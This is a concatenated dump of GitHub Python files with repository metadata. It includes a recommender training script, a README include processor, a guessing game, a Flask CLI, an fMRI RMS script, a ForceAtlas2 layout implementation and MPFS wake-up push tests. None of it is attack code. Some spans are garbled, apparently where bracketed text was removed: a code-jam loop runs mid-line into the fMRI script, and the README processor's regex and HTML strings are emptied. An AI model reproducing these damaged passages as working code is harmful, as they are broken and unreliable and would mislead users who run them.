_print_args(self):\n n_trainable_params, n_nontrainable_params = 0, 0\n for p in self.model.parameters():\n n_params = torch.prod(torch.tensor(p.shape))\n if p.requires_grad:\n n_trainable_params += n_params\n else:\n n_nontrainable_params += n_params\n print('\\nn_trainable_params: {0}, n_nontrainable_params: {1}'.format(n_trainable_params, n_nontrainable_params))\n print('> training arguments:')\n for arg in vars(self.opt):\n print('>>> {0}: {1}'.format(arg, getattr(self.opt, arg)))\n print('')\n\n def run(self, repeats):\n results = []\n rndseed = [19427, 78036, 37498, 87299, 60330] # randomly-generated seeds\n for i in range(repeats):\n print('\\n💫 run: {}/{}'.format(i+1, repeats))\n \n if self.opt.model_name in ['transperis', 'linearperis', 'peris', 'fir']:\n print('\\nWarmup up to {}-th epoch\\n'.format(self.opt.warmup_epochs))\n \n random.seed(rndseed[i]); np.random.seed(rndseed[i]); torch.manual_seed(rndseed[i])\n self._reset_params()\n \n results.append(ins.train())\n \n results = np.array(results)\n \n hrs_mean = np.array([list(i.values()) for i in results[:,0]]).mean(0)\n ndcg_mean = np.array([list(i.values()) for i in results[:,1]]).mean(0)\n \n hrs_std = np.array([list(i.values()) for i in results[:,0]]).mean(0)\n ndcg_std = np.array([list(i.values()) for i in results[:,1]]).mean(0) \n \n print('*TST Performance\\tTop2\\tTop5\\t\\tTop10\\t\\tTop20\\t')\n print('*HR means: {}'.format(', '.join(hrs_mean.astype(str))))\n print('*NDCG means: {}'.format(', '.join(ndcg_mean.astype(str))))\n \n def _reset_params(self):\n self.model = self.opt.model_class(self.opt).cuda()\n \ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\nif __name__ == '__main__': \n parser = argparse.ArgumentParser()\n parser.add_argument('--model_name', default='peris', type=str)\n parser.add_argument('--dataset', default='cell', type=str) \n parser.add_argument('--num_run', default=5, type=int)\n parser.add_argument('--gpu', default=0, type=int)\n parser.add_argument('--num_epoch', default=50, type=int)\n parser.add_argument('--learning_rate', default=1e-2, type=float) \n parser.add_argument('--batch_size', default=128, type=int) \n parser.add_argument('--l2reg', default=0.0, type=float) \n \n parser.add_argument('--margin', default=0.6, type=float) \n parser.add_argument('--K', default=50, type=int) \n parser.add_argument('--numneg', default=5, type=int) \n \n parser.add_argument('--lamb', default=0.2, type=float)\n parser.add_argument('--mu', default=0.2, type=float)\n \n parser.add_argument('--binsize', default=8, type=int)\n parser.add_argument('--period', default=64, type=int) \n parser.add_argument('--tau', default=0, type=float)\n parser.add_argument('--bin_ratio', default=0.5, type=float) \n parser.add_argument('--neg_weight', default=1.0, type=float) \n parser.add_argument('--warmup_epochs', default=5, type=int) \n parser.add_argument('--maxhist', default=100, type=int)\n \n opt = parser.parse_args()\n \n torch.cuda.set_device(opt.gpu)\n \n model_classes = { \n 'peris':PERIS, \n } \n \n dataset_path = './data/{}/rec'.format(opt.dataset)\n \n opt.model_class = model_classes[opt.model_name]\n opt.dataset_path = dataset_path\n\n ins = Instructor(opt)\n \n ins.run(opt.num_run) \n","repo_name":"anon-subm/PERIS","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18309293318","text":"\n\nimport html\nfrom pathlib import Path\nimport re\n\ninclude_re = r'()(\\r?\\n)[\\S\\s]*?\\r?\\n()'\n\ndef ansi_to_html(text):\n text = html.escape(text)\n text = (text\n .replace('\u001B[0m', '')\n .replace('\u001B[32m', '')\n .replace('\u001B[35m', '')\n .replace('\u001B[90m', '')\n )\n return text\n\ndef ansi_to_plain(text):\n text = (text\n .replace('\u001B[0m', '')\n .replace('\u001B[32m', '')\n .replace('\u001B[35m', '')\n .replace('\u001B[90m', '')\n )\n return text\n\ndef replace_by_file_html(m: re.Match) -> str:\n file = m.group(2).strip()\n text = Path(file).read_text()\n return m.group(1) + m.group(3) + '
    ' + m.group(3) + ansi_to_html(re.sub(r'^[\\r\\n\\s]*\\r?\\n', '', text.rstrip())) + m.group(3) + '
    ' + m.group(3) + m.group(4)\n\ndef replace_by_file(m: re.Match) -> str:\n file = m.group(2).strip()\n text = Path(file).read_text()\n return m.group(1) + m.group(3) + '```' + m.group(3) + ansi_to_plain(re.sub(r'^[\\r\\n\\s]*\\r?\\n', '', text.rstrip())) + m.group(3) + '```' + m.group(3) + m.group(4)\n\ndef process_file(filename: 'Path|str'):\n text = Path(filename).read_text()\n text = re.sub(include_re, replace_by_file, text)\n Path(filename).write_text(text)\n\nprocess_file('README.md')\n","repo_name":"doki-nordic/actions-playground","sub_path":"scripts/process_readme.py","file_name":"process_readme.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"75025171111","text":"import random\r\n\r\n#Load words and store them in a list\r\nword_list = []\r\nword_file = open(\"words.txt\")\r\nfor word in word_file:\r\n word_list.append(word.strip())\r\n \r\n#pick a word from the list\r\n#storing the answer in the variable called answer\r\nanswer = random.choice(word_list)\r\nprint(answer)\r\nnum_of_guesses = 0\r\nguess_correctly = False\r\n\r\nwhile num_of_guesses < 3 and not guess_correctly:\r\n guess = str(input(\"What is yor guess: \"))\r\n print(\"Your guess was not correct.\")\r\n print(\"You guessed: {}\".format(guess))\r\n guess = guess.lower()\r\n num_of_guesses += 1\r\n if guess == answer:\r\n guess_correctly = True\r\n else:\r\n guess_correctly = False\r\n \r\nif guess_correctly:\r\n print(\"Congratulations..!! you guessed the right word\")\r\n print(\"It took you {} guesses\".format(num_of_guesses))\r\nelse:\r\n print(\"You used all your choices\")\r\n \r\n\r\n \r\n ","repo_name":"code-lova/BYU-Python-programming","sub_path":"programming_building_blocks/week7/week7_guessinggame.py","file_name":"week7_guessinggame.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25717916376","text":"from datetime import timedelta\nimport time\n\nfrom flask.cli import AppGroup\nfrom flask import current_app\nfrom prometheus_client import push_to_gateway\n\nfrom coalics.models import db\nfrom coalics import tasks, config\nfrom coalics.metrics import push_registry, update_success_time\n\n\ndef init_cli(app):\n\n cli = AppGroup(\"coalics\")\n\n @cli.command(\"init_db\")\n def init_db():\n db.create_all()\n\n @cli.command(\"schedule\")\n def schedule():\n logger = current_app.logger\n td = timedelta(seconds=app.config[\"SOURCE_UPDATE_FREQUENCY\"])\n logger.info(\"Scheduler launching\")\n while True:\n try:\n logger.info(\"Begin schedule run\")\n tasks.update_sources()\n logger.info(\"Scheduler: ran without error\")\n except Exception as e:\n logger.error(\"Scheduler: caught error {}\".format(str(e)), exc_info=True)\n finally:\n logger.info(\"Scheduler: Sleeping for {}s\".format(td.seconds))\n time.sleep(td.seconds)\n\n @cli.command(\"update\")\n def update():\n logger = current_app.logger\n logger.info(\"Begin update run\")\n tasks.update_sources()\n logger.info(\"Update ran without error\")\n\n if config.UPDATE_PUSHGATEWAY is not None:\n push_to_gateway(config.UPDATE_PUSHGATEWAY, \"coalics_update\", push_registry)\n update_success_time.set_to_current_time()\n\n app.cli.add_command(cli)\n","repo_name":"paulgessinger/coalics","sub_path":"src/coalics/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15205030449","text":"inp_file=file(\"C-small.in\")\r\nout_file=file(\"C-small.out\",\"w\")\r\n\r\ndef solve(line):\r\n line=[int(c1) for c1 in line.split(\" \")]\r\n card_num,indices=line[:2]\r\n line=line[2:]\r\n positions=range(card_num)\r\n result=[0 for c1 in range(card_num)]\r\n c1=1 # pocet umistenych karet\r\n c2=0\r\n while c10:\n confounds_list[inputidx][\"outliermat\"]=confoundmat[:,outlieridx]\n \n #read in --outlierfile inputs if provided, overwriting values from --confoundfile\n if len(outlierfile_list)==num_inputs:\n for inputidx,outlierfile in enumerate(outlierfile_list):\n outliermat=np.loadtxt(outlierfile)>0\n confounds_list[inputidx][\"outliermat\"]\n\n Dt_concat=[]\n for inputidx,inputfile in enumerate(inputnogsr_list):\n confounds_dict=confounds_list[inputidx]\n\n Dt,roivals,roisizes,tr_input,vol_info,input_extension = load_input(inputfile)\n if vol_info is not None and not outputvolumeformat in [\"same\",\"auto\"]:\n vol_info[\"extension\"]=outputvolumeformat\n \n Dt_gsr,roivals,roisizes,tr_input,vol_info,input_extension = load_input(inputgsr_list[inputidx])\n \n Dt=Dt-Dt_gsr\n \n print(\"Loaded input file: %s (%dx%d)\" % (inputfile,Dt.shape[0],Dt.shape[1]))\n if tr_input:\n tr=tr_input\n\n mask=None\n if len(maskfile_list)==num_inputs:\n maskfile=maskfile_list[inputidx]\n mask,_,_,_,mask_vol_info,_ = load_input(maskfile)\n masksize=list(mask.shape[:2])+[1]\n print(\"Loaded mask file: %s (%s)\" % (maskfile,\"x\".join([str(x) for x in masksize[:2]])))\n \n if mask_vol_info is not None and vol_info is not None:\n #map mask to full voxel space (and intersectc with input data mask)\n mask_full=np.zeros(mask_vol_info['mask'].shape)\n mask_full[mask_vol_info['mask']]=mask\n mask_full=(mask_full*vol_info['mask'])>0\n \n #then map mask from full voxel space to masked data space\n mask=mask_full[vol_info['mask']>0]\n \n vol_info['mask']=mask_full\n Dt=Dt[:,mask]\n else:\n mask=None\n \n numvols=Dt.shape[0]\n \n outliermat=np.zeros((numvols,1))\n if confounds_dict[\"outliermat\"] is not None:\n outliermat=confounds_dict[\"outliermat\"]\n \n outlierflat=np.sum(vec2columns(outliermat)!=0,axis=1)[:,None]\n outlierflat[:skipvols,:]=True\n outlierflat=outlierflat[:,0]\n \n numvols_not_outliers=np.sum(np.abs(outlierflat)==0,axis=0)\n print(\"Non-outlier volumes: \", numvols_not_outliers)\n \n print(\"Masked data size after outlier exclusion: (%dx%d)\" % (Dt.shape[0],Dt.shape[1]))\n \n Dt_rms=np.sqrt(np.mean(Dt[outlierflat==0,:]**2,axis=0))\n \n if do_concat:\n Dt_concat+=[Dt_rms]\n \n if len(outbase_list)==num_inputs:\n savedfilename, shapestring = save_timeseries(outbase_list[inputidx]+\"\", input_extension, {\"ts\":Dt_rms,\"roi_labels\":roivals,\"roi_sizes\":roisizes,\"repetition_time\":tr}, vol_info)\n print(\"Saved %s (%s)\" % (savedfilename,shapestring))\n \n if do_concat and len(Dt_concat)>1:\n Dt_concat=np.mean(np.vstack(Dt_concat),axis=0)\n savedfilename, shapestring = save_timeseries(outbase_list[0]+\"\", input_extension, {\"ts\":Dt_concat,\"roi_labels\":roivals,\"roi_sizes\":roisizes,\"repetition_time\":tr}, vol_info)\n print(\"Saved %s (%s)\" % (savedfilename,shapestring))\nif __name__ == \"__main__\":\n run_rmsglobal(sys.argv[1:])\n","repo_name":"kjamison/fmriclean","sub_path":"fmri_rmsglobal.py","file_name":"fmri_rmsglobal.py","file_ext":"py","file_size_in_byte":6759,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"38794743342","text":"import numpy as np\nimport networkx as nx\n\nfrom .node import NodeCollection, Node\n\n# from .utils import *\nfrom .region import RootRegion\nfrom .energy_function import attraction, repulsion, gravity,adjust_speed\nimport random\nfrom typing import Optional\n\n\n\n\n\n\nclass ForceAtlas2(object):\n \"\"\"\n Main class that runs the ForceAtlas2 algorithm\n \"\"\"\n def __init__(\n self,\n graph: nx.Graph,\n edge_weight_influence: float = 1,\n scaling_ratio: float = 2.0,\n gravity: float = 1.0,\n speed: float = 1.0,\n speed_efficiency: float = 1.0,\n jitter_tolerance: float = 1.0,\n max_force:Optional[float] = None,\n quadtree_maxsize:int = 1000,\n dissuade_hubs: bool = False,\n prevent_overlap: bool = True,\n barnes_hut_optimize: bool = False,\n barnes_hut_theta: float = 1.2,\n lin_log_mode: bool = False,\n normalize_edge_weights: bool = False,\n strong_gravity_mode: bool = False,\n positions={},\n sizes={},\n ):\n\n \"\"\"\n\n Parameters\n ----------\n graph : nx.Graph\n input graph\n edge_weight_influence : int\n influence of edges' weight in the spatialisation\n scaling_ratio : float\n force coefficient\n gravity : float\n gravity\n speed : float\n coefficient applied to nodes' movement vector each iteration\n max_force : float|int\n maximum magnitude of a movement vector\n quadtree_maxsize : int\n maximum number of nodes in the quadtree used when `barnes_hut_optimize = True`\n outbound_attraction_distribution: bool\n use a node mass (=degree) in the attraction computation\n prevent_overlap : bool\n prevent node overlapping (use node size)\n barnes_hut_optimize : bool\n enable fast computation of ForceAtlas2 by subdividing the graph into a Quadtree. Each node's new position is\n computed based on nodes in the Quadtree where it is.\n barnes_hut_theta : float\n constant (by default set to 1.2)\n lin_log_mode : bool\n multiply the attraction force by the logarithm of the distance\n normalize_edge_weights : bool\n if True, normalize edge weights. Formula w = (w-min)/(max-min)\n strong_gravity_mode : bool\n enable strong gravity mode\n positions : dict\n dictionary containing initial positions for the graph's nodes. Initialized with random values if empty\n sizes : dict\n dictionary that contains each node's size (by default, degree of each node)\n \"\"\"\n self.root_region = None\n self.strong_gravity_mode = strong_gravity_mode\n self.normalize_edge_weights = normalize_edge_weights\n self.lin_log_mode = lin_log_mode\n self.barnes_hut_theta = barnes_hut_theta\n self.barnes_hut_optimize = barnes_hut_optimize\n self.prevent_overlap = prevent_overlap\n self.dissuade_hubs = dissuade_hubs\n self.speed = speed\n self.gravity = gravity\n self.scaling_ratio = scaling_ratio\n self.edge_weight_influence = edge_weight_influence\n self.max_force = max_force\n self.quadtree_maxsize = quadtree_maxsize\n self.speed_efficiency = speed_efficiency\n self.jitter_tolerance = jitter_tolerance\n\n\n self.graph = graph\n\n \n\n # if no weight associated to an edge, set its value to min\n min_weight = np.inf\n edges_weights = list(nx.get_edge_attributes(self.graph, \"weight\").values())\n if len(edges_weights) == 0:\n min_weight = 1\n else:\n min_weight = np.min(edges_weights)\n\n for src, tar, attr in self.graph.edges(data=True):\n if not \"weight\" in attr:\n self.graph.edges[src, tar][\"weight\"] = min_weight\n\n # Initialize node attributes\n self.nodes_attributes = NodeCollection()\n\n \n for node in self.graph:\n param = {\n \"id\": node,\n \"dx\": 0,\n \"dy\": 0,\n \"mass\": 1+self.graph.degree(node),\n \"x\": random.random()*1000 if not node in positions else positions[node][0],\n \"y\": random.random()*1000 if not node in positions else positions[node][1],\n \"size\": self.graph.degree(node) if not node in sizes else sizes[node],\n }\n self.nodes_attributes + Node(**param)\n \n self.root_region: RootRegion = None\n\n # if normalization activated, we pre-compute edge weights' minimum and maximum\n if self.normalize_edge_weights:\n edges_weights = list(nx.get_edge_attributes(self.graph, \"weight\").values())\n self.weight_min = np.min(edges_weights)\n self.weight_max = np.max(edges_weights)\n \n\n\n def get_positions(self):\n \"\"\"\n Return computed positions of the graph's node using\n the ForceAtlas2 algorithm\n\n Returns\n -------\n dict\n dict with key corresponding to node id and the value corresponding\n to its positions in a 2D space\n \"\"\"\n positions = {}\n for n in self.graph:\n positions[n] = [self.nodes_attributes[n].x, self.nodes_attributes[n].y]\n return positions\n\n def iteration(self):\n \"\"\"\n Update the positions of the nodes by applying the Force2Atlas algorithm.\n In order to exploit the potential of the ForceAtlas2 algorithm, it's common to run the algorithm \n multiple times \n \"\"\"\n\n # Update nodes attributes by storing previous state information and reinitialize\n # node mass\n for node in self.graph:\n self.nodes_attributes[node].mass = 1+self.graph.degree(node)\n self.nodes_attributes[node].old_dx = self.nodes_attributes[node].dx\n self.nodes_attributes[node].old_dy = self.nodes_attributes[node].dy\n\n self.nodes_attributes[node].dx = 0\n self.nodes_attributes[node].dy = 0\n\n # If Barnes Hut active, initialize root region\n if self.barnes_hut_optimize:\n # limit the quadtree size for performance issue\n RootRegion.REGION_LEFT = self.quadtree_maxsize\n self.root_region = RootRegion(\n list(self.graph.nodes()), self.nodes_attributes\n )\n self.root_region.build_sub_region()\n\n # If outbound_attraction_distribution active, compensate\n outbound_compensation = 0\n if self.dissuade_hubs:\n for n in self.graph:\n outbound_compensation += self.nodes_attributes[n].mass\n\n outbound_compensation /= len(self.graph)\n\n\n # Apply Repulsion\n if self.barnes_hut_optimize:\n from joblib import Parallel,delayed\n Parallel(n_jobs=8,backend=\"threading\")(delayed(self.root_region.apply_force)(n, self.barnes_hut_theta, self.scaling_ratio, self.prevent_overlap) for n in self.graph)\n # for n in self.graph:\n # self.root_region.apply_force(\n # n, self.barnes_hut_theta, self.scaling_ratio, self.prevent_overlap\n # )\n else:\n for n1 in self.graph:\n nu = self.nodes_attributes[n1]\n for n2 in self.graph:\n nv = self.nodes_attributes[n2]\n if n1 == n2:\n continue\n factor = repulsion(\n nu,\n nv,\n self.scaling_ratio,\n prevent_overlap=self.prevent_overlap,\n )\n self.nodes_attributes.apply(n1, n2, factor)\n\n # Apply Gravity\n for n in self.graph:\n factor = gravity(self.nodes_attributes[n], gravity=self.gravity/self.scaling_ratio,scaling_ratio=self.scaling_ratio,strong_gravity=self.strong_gravity_mode)\n self.nodes_attributes.apply_g(n, factor)\n \n for src, tar, attr in self.graph.edges(data=True): # type: ignore\n w = 1\n if self.edge_weight_influence > 0:\n w = attr[\"weight\"] ** self.edge_weight_influence\n if self.normalize_edge_weights:\n w = (w - self.weight_min) / (self.weight_max - self.weight_min)\n\n factor = attraction(\n self.nodes_attributes[src],\n self.nodes_attributes[tar],\n outbound_compensation if self.dissuade_hubs else 1,\n lin_log=self.lin_log_mode,\n prevent_overlap=self.prevent_overlap,\n weight=w,distributed=self.dissuade_hubs\n )\n self.nodes_attributes.apply(src, tar, factor)\n\n \n # Adjust speed and apply changes to nodes' position \n self.speed = adjust_speed(self.speed,self.nodes_attributes,self.jitter_tolerance,self.speed_efficiency)\n for n in self.graph:\n node_speed=self.speed\n ni = self.nodes_attributes[n]\n \n force = np.sqrt(ni.dx**2 + ni.dy**2)\n if self.max_force and force > self.max_force :\n self.nodes_attributes[n].dx = (self.nodes_attributes[n].dx*self.max_force)/force\n self.nodes_attributes[n].dy = (self.nodes_attributes[n].dy*self.max_force)/force\n\n\n swinging = ni.mass* np.sqrt((ni.old_dx - ni.dx) **2 + (ni.old_dy - ni.dy)**2)\n \n if self.prevent_overlap:\n node_speed = 0.1 * self.speed / (1.0 + np.sqrt(self.speed *swinging))\n df = np.sqrt(ni.dx**2 + ni.dy**2)\n node_speed = min(node_speed*df,10.)/df\n else:\n node_speed= self.speed/(1+np.sqrt(self.speed*swinging))\n\n\n self.nodes_attributes[n].x = (\n self.nodes_attributes[n].x + self.nodes_attributes[n].dx * node_speed \n )\n self.nodes_attributes[n].y = (\n self.nodes_attributes[n].y + self.nodes_attributes[n].dy * node_speed \n )","repo_name":"Jacobe2169/forceatlas2","sub_path":"force_atlas_layout/force_atlas2.py","file_name":"force_atlas2.py","file_ext":"py","file_size_in_byte":10167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26545209827","text":"from collections import deque\n\n\ndef solution(numbers, target):\n que = deque([0])\n for number in numbers:\n sub_que = deque()\n for b in que:\n sub_que.append(b+number)\n sub_que.append(b-number)\n que = sub_que\n return que.count(target)\n\n\nprint(solution([1, 1, 1, 1, 1], 3) == 5)\nprint(solution([4, 1, 2, 1], 4) == 2)\n","repo_name":"do-park/algorithm-2022","sub_path":"programmers/타겟_넘버.py","file_name":"타겟_넘버.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2893683415","text":"import subprocess\nimport os\n\n\ndef build_executable(script_path, one_file=True, no_console=False, additional_paths=None, exe_name=None):\n \"\"\"\n Build a single executable from a Python script using PyInstaller.\n\n Args:\n - script_path (str): Path to the Python script to be converted.\n - one_file (bool): Whether to bundle everything into a single executable.\n - no_console (bool): Whether to suppress the console window for GUI applications.\n - additional_paths (list): List of additional paths to include.\n \"\"\"\n pyinstaller_path = \"pyinstaller\"\n\n # Generate initial spec file\n spec_args = [pyinstaller_path, \"--onefile\" if one_file else \"--onedir\", script_path]\n\n if no_console:\n spec_args.append(\"--noconsole\")\n if exe_name:\n spec_args.extend([\"--name\", exe_name])\n subprocess.run(spec_args)\n\n\n\n # Modify spec file to include additional paths\n spec_file = os.path.splitext(os.path.basename(script_path))[0] + \".spec\"\n if additional_paths:\n with open(spec_file, \"r\") as file:\n content = file.readlines()\n\n with open(spec_file, \"w\") as file:\n for line in content:\n if line.strip().startswith(\"pathex=\"):\n # Add additional paths to the pathex list\n paths = \", \".join([f\"'{path}'\" for path in additional_paths])\n line = f\" pathex=[{paths}],\\n\"\n file.write(line)\n\n # Build executable using modified spec file\n build_args = [pyinstaller_path, spec_file]\n print(f\"Running command: {' '.join(build_args)}\") # Print the command\n subprocess.run(build_args)\n\n\nif __name__ == \"__main__\":\n # Example usage\n script_to_convert = \"main.py\"\n additional_paths = [r'C:\\\\Users\\\\Admin\\\\PycharmProjects\\\\VisualSimulation\\\\my_modules']\n build_executable(script_to_convert,\n one_file=True,\n no_console=False,\n additional_paths=additional_paths,\n exe_name=\"Particle_Simulator\")\n","repo_name":"giedrius2020/ParticleSimulator","sub_path":"build_exe.py","file_name":"build_exe.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29282483884","text":"# Compatible with ranger 1.6.*\n#\n# Filter with smart-case-intivity. If filter is all lowercase\n# it performs a insensitive search. Otherwise it applies case-sensitivity.\n#\n\n# Save the original filter function\nimport ranger.container.directory\n_accept_file = ranger.container.directory.accept_file\n\n# Define a new one\ndef custom_accept_file(fname, directory, hidden_filter, name_filter):\n\n if not name_filter:\n return _accept_file(fname, directory, hidden_filter, name_filter)\n\n # all lower case is processed as case-insensitive search\n nfilter = name_filter.pattern\n if nfilter.islower():\n fname = fname.lower()\n\n # Only process filtered input\n if nfilter in fname:\n return True\n\n return False\n\n\n# Overwrite the old function\nimport ranger.container.directory\nranger.container.directory.accept_file = custom_accept_file\n","repo_name":"desyncr/rangr","sub_path":"plugins/plugin_file_filter.py","file_name":"plugin_file_filter.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15925859171","text":"import traceback\nimport lorem\nimport re\nfrom random import randint\n\nfrom telegram import Message, MessageEntity\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, BaseFilter, Filters\nfrom cstream import stdwar, stderr, stdout\n\nfrom botele import Botele\n\n\nclass GremioEciBot(Botele):\n \"\"\"\"\"\"\n\n @Botele.command(\"start\", \"Inicializa um chat com o bot\")\n def _start(self, info: dict):\n stdout[2] << f\"> /start from @{info['username']}\"\n params = {\n \"chat_id\": info[\"chat_id\"],\n \"text\": \"Olá, eu sou o bot do Grêmio ECI/UFRJ.\",\n }\n return info[\"bot\"].send_message(**params)\n\n @Botele.command(\"lorem\", \"Gera um parágrafo Lorem Ipsum\")\n def lorem(self, info: dict):\n stdout[2] << f\"> /lorem from @{info['username']}\"\n params = {\n \"chat_id\": info[\"chat_id\"],\n \"text\": lorem.paragraph(),\n }\n return info[\"bot\"].send_message(**params)\n\n @Botele.command(\"comandos\", \"Lista os comandos disponíveis\")\n def comandos(self, info: dict):\n stdout[2] << f\"> /comandos from @{info['username']}\"\n params = {\n \"chat_id\": info[\"chat_id\"],\n \"text\": \"\\n\".join([f\"/{cmd}\" for cmd, des in self.command_list]),\n }\n return info[\"bot\"].send_message(**params)\n\n @Botele.command(\"lista\")\n def _lista(self, info):\n stdout[2] << f\"> /lista from @{info['username']}\"\n params = {\n \"chat_id\": info[\"chat_id\"],\n \"text\": self.list_commands(),\n }\n return info[\"bot\"].send_message(**params)\n\n @Botele.message(Filters.command)\n def unknown(self, info: dict):\n stdout[2] << f\"> Unknown command '{info['text']}' from @{info['username']}\"\n params = {\n \"chat_id\": info[\"chat_id\"],\n \"text\": f\"Comando inválido: `{info['text']}`\",\n \"parse_mode\": self.MARKDOWN,\n }\n return info[\"bot\"].send_message(**params)\n\n @Botele.error\n def error(self, info: dict):\n for line in traceback.format_tb(info[\"error\"].__traceback__):\n stderr[0] << line\n stderr[0] << info[\"error\"]\n","repo_name":"pedromxavier/botele","sub_path":"archive/gremioecibot/gremioecibot.py","file_name":"gremioecibot.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"126902569","text":"# -*- coding: utf-8 -*-\n\nimport mock\nimport random\nfrom nose_parameterized import parameterized\nfrom mpfs.core.wake_up.operations import WakeUpOperation\nfrom test.parallelly.json_api.base import CommonJsonApiTestCase\nfrom test.helpers.operation import PendingOperationDisabler\nfrom test.helpers.stubs.services import PushServicesStub\nfrom test.parallelly.api.disk.base import DiskApiTestCase\nfrom mpfs.common.util import to_json, from_json\nfrom mpfs.common.static import codes\n\n\nclass WakeUpTestCase(CommonJsonApiTestCase, DiskApiTestCase):\n device_id = 'DFBDE026-32ED-4S5A-9H9F-D1R497E64006'\n\n def test_wake_up_push_start(self):\n self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})\n\n def test_wake_up_push_job_type(self):\n with mock.patch('mpfs.core.queue.mpfs_queue.put') as mocked_queue_put:\n self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})\n args, kwargs = mocked_queue_put.call_args_list[0]\n assert args[1] == 'operation_service'\n\n def test_wake_up_push_start_with_missing_subscription(self):\n wrong_device_id = 'DFBDE026-32ED-4S5A-9H9F-D1R497E640061234'\n self.json_error('wake_up_push_start', {'uid': self.uid, 'device_id': wrong_device_id},\n code=codes.DEVICE_SUBSCRIPTION_NOT_FOUND)\n\n def test_wake_up_push_start_with_uninitialized_uid(self):\n self.json_error('wake_up_push_start', {'uid': 1234, 'device_id': self.device_id}, code=codes.WH_USER_NEED_INIT)\n\n def test_second_wake_up_push_start_request(self):\n with PendingOperationDisabler(WakeUpOperation):\n oid1 = self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})['oid']\n oid2 = self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})['oid']\n self.assertEqual(oid1, oid2)\n\n def test_wake_up_push_start_interval(self):\n self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id, 'interval': 20})\n\n @parameterized.expand([(20, 20),\n (7, 15),\n (-14, 15),\n (120, 120)])\n def test_wake_up_interval(self, interval, result_interval):\n with mock.patch('mpfs.core.operations.base.Operation.reenque') as mock_obj:\n resp = self.json_ok('wake_up_push_start', {'uid': self.uid,\n 'device_id': self.device_id,\n 'interval': interval})\n assert resp\n for call in mock_obj.call_args_list:\n assert call[0][0] == result_interval\n\n def test_wake_up_push_stop(self):\n session_id = self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})['session_id']\n resp = self.client.get('disk/operations', uid=self.uid)\n self.assertEqual(len(from_json(resp.result)['items']), 1)\n self.json_ok('wake_up_push_stop', {'session_id': session_id})\n resp = self.client.get('disk/operations', uid=self.uid)\n self.assertEqual(len(from_json(resp.result)['items']), 0)\n\n @parameterized.expand([('wakeUpPushSessionId', codes.BAD_REQUEST_ERROR),\n ('wakeUpPush:SessionId', codes.BAD_REQUEST_ERROR),\n ('123:1234', codes.BAD_REQUEST_ERROR),\n ('123:1234:1234', codes.BAD_REQUEST_ERROR),\n (':89519942f316497b2e1453f5237644b1f1c5731fb2fd669d1b08c61e8f97c041', codes.PATH_ERROR),\n ('128280859:', codes.PATH_ERROR),\n ])\n def test_wake_up_push_stop_with_invalid_session_id(self, session_id, code):\n self.json_error('wake_up_push_stop', {'session_id': session_id}, code)\n\n def test_wake_up_push_stop_with_missing_operation(self):\n oid = self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})['oid']\n random_oid = ''.join(random.sample(oid, len(oid)))\n session_id = '%s:%s' % (self.uid, random_oid)\n self.json_error('wake_up_push_stop', {'session_id': session_id}, code=codes.OPERATION_NOT_FOUND)\n\n def test_wake_up_push_batch_send(self):\n with PushServicesStub() as push_stub:\n with PendingOperationDisabler(WakeUpOperation):\n result = self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})\n oid = result['oid']\n uid = self.uid\n PendingOperationDisabler.process(uid, oid)\n assert push_stub.batch_send.called\n args, _ = push_stub.batch_send.call_args_list[-1]\n batch_send_opts_recipients = [{self.uid: u'mob:f20e1c0cd36ea31432e66d880b20b16c'}]\n batch_send_opts_event = 'wake_up'\n batch_send_opts_data = to_json({'root': {'session_id': '{}:{}'.format(uid, oid), 'tag': 'wake_up'}})\n self.assertEqual(args[0], batch_send_opts_recipients)\n self.assertEqual(args[1], batch_send_opts_event)\n self.assertEqual(args[2], batch_send_opts_data)\n\n def test_wake_up_push_subscriptions_list(self):\n with PushServicesStub() as push_stub:\n with PendingOperationDisabler(WakeUpOperation):\n result = self.json_ok('wake_up_push_start', {'uid': self.uid, 'device_id': self.device_id})\n oid = result['oid']\n uid = self.uid\n PendingOperationDisabler.process(uid, oid)\n assert push_stub.subscriptions_list.called\n args, _ = push_stub.subscriptions_list.call_args_list[-1]\n self.assertEqual(args[0], self.uid)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"disk/test/parallelly/wake_up_suite.py","file_name":"wake_up_suite.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70857861994","text":"# Conduction the first experiment\n# parameters: \n# -s or 